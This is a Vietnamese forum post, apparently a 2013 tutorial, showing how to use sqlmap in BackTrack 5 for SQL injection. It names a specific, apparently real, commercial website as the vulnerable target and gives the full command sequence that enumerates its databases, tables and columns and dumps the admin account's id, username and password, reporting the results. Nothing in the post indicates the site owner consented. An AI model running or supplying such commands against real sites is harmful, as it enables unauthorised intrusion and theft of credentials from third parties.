sqli dùng bộ sqlmap trong backtrack 5
TRANSCRIPT
SQLi dùng bộ sqlmap trong backtrack 5Thảo luận trong 'Kiến thức' bắt đầu bởi crazykid, 14/8/13.
crazykidModerator
Bài viết:
137
Demo: link lỗi sqli http://autohoabinh.com/?page=products_detail&id=296&catid=2'Vào thư mục chưa bộ công cụ sqlmapcd /pentest/database/sqlmap/
đầu tiên ta get database nhéMã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" --dbs
ở đây --dbs là databasesthêm 1 số cái nữa như--dbs DBMS databases--tables DBMS database tables--columns DBMS database table columns--schema DBMS schema
--dump dump dữ liệu
Database nhận đc là athb_db nhé.tiếp tục ta get các table như sau
Mã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db --tables
table tbl_admin là table chúng ta cần khai thác đúng hok nào,giờ ta lấy các column nhéMã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin --columns
kết quả nhận đc như sau
bây giờ ta sẽ dump các trường id,name và pass nhé.ta dump trường id trước nào Mã:python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C id --dump
kết quả nhận đc là id ->1tương tự ta dump các trường còn lại Mã: python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C name --dump
kết quả nhận đc thì user là admin nhéMã: python sqlmap.py -u "http://autohoabinh.com/?page=products_detail&id=296&catid=2" -D athb_db -T tbl_admin -C pass --dump
dump đc pass là khoản trắng!!!hic..là sao ta.ko có pass hả ta ) hay là nó ẩn ta.Cơ mà ko sao,biết cách làm là đc ùi,hihi [vì mới thử lại bằng darkmysql cũng nhận đc là khoảng trắng ) ]
Read more: http://root.vn/threads/sqli-dung-bo-sqlmap-trong-backtrack-5.4830/#ixzz3B0NjQLZk